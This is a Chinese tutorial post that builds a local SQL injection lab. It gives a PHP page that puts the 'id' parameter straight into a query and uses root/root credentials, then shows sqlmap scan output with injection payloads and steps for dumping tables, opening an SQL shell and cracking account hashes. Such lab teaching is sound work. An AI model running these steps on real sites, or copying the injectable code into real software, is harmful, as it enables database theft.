搭建SQL注入环境（一）

环境

• HTML代码：

<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Newstitle>
head>
<body>
	<form action="news.php" method="get" >
		<input type="hidden" name="id" id="1" value="1">
		<button type="submit">新闻1button>
	form>
	<form action="news.php" method="get">
		<input type="hidden" name="id" id="2" value="2">
		<button type="submit">新闻2button>
	form>
	<form action="news.php" method="get">
		<input type="hidden" name="id" id="3" value="3">
		<button type="submit">新闻3button>
	form>
body>
html>

• php代码：

 
	$serverName = "127.0.0.1:3306";
	$username = "root";
	$passwd = "root";
	$dbName = "php_test";
	
	$conn = mysqli_connect($serverName, $username, $passwd, $dbName);
	if(!$conn)
		die("数据库连接失败！" . mysql_error());
	// 接收表单内容
	$id = $_GET["id"];
	// $passwd = $_POST["passwd"];
	// 生成SQL语句
	$sql = "SELECT content FROM news WHERE id = {$id};";
	// SQL查询
	$result = mysqli_query($conn, $sql);
	// 判断是否有符合条件的行
	if(mysqli_num_rows($result) <= 0){ ?>
		<p style="text-align: center; font-size: 20">Error！！！</p>
	 }
	else{ 
		while ($row = mysqli_fetch_assoc($result)) {?>
			<p style="text-align: center; font-size: 20"> echo $row["content"]; ?></p>
		 }
	}
	// 输出本次查询的SQL语句
	echo "

";
	echo "SQL语句：", $sql;
	mysqli_close($conn);
 ?>

注入测试

• Sqlmap进行扫描

python sqlmap.py -u "http://localhost:8080/php/php_study/sql/SQL Injection/news.php?id=1"

扫描结果

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8161=8161

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 OR (SELECT 2761 FROM(SELECT COUNT(*),CONCAT(0x716a786271,(SELECT (ELT(2761=2761,1))),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 3708 FROM (SELECT(SLEEP(5)))cpun)

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a786271,0x635243766664686562586d504c70654b6364456e434a75494a4a427769757950666c795463445653,0x717a767171)-- KDFo
---
[14:50:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0

• 存在注入，开始查库

python sqlmap.py -u " …… " --dbs

查询结果：

• 查 php_test 的表

python sqlmap.py -u " …… " -D php_test --tables

查询结果：

• 查 user 表的字段

python sqlmap.py -u " …… " -D php_test -T user --columns

查询结果：

• 查 username 字段内容

python sqlmap.py -u " …… " -D php_test -T user -C username --dump

查询结果：

• 其余同理。

扩展

• 创建一个和数据库交互的shell（--sql-shell）

python sqlmap.py -u " …… " --sql-shell

• 查询数据库所有账户（--users --password）

python sqlmap.py -u " …… " --users --password

将此hash解密（查表）

• 查询指定库的所有信息（-a）

python sqlmap.py -u " …… " -D php_test -a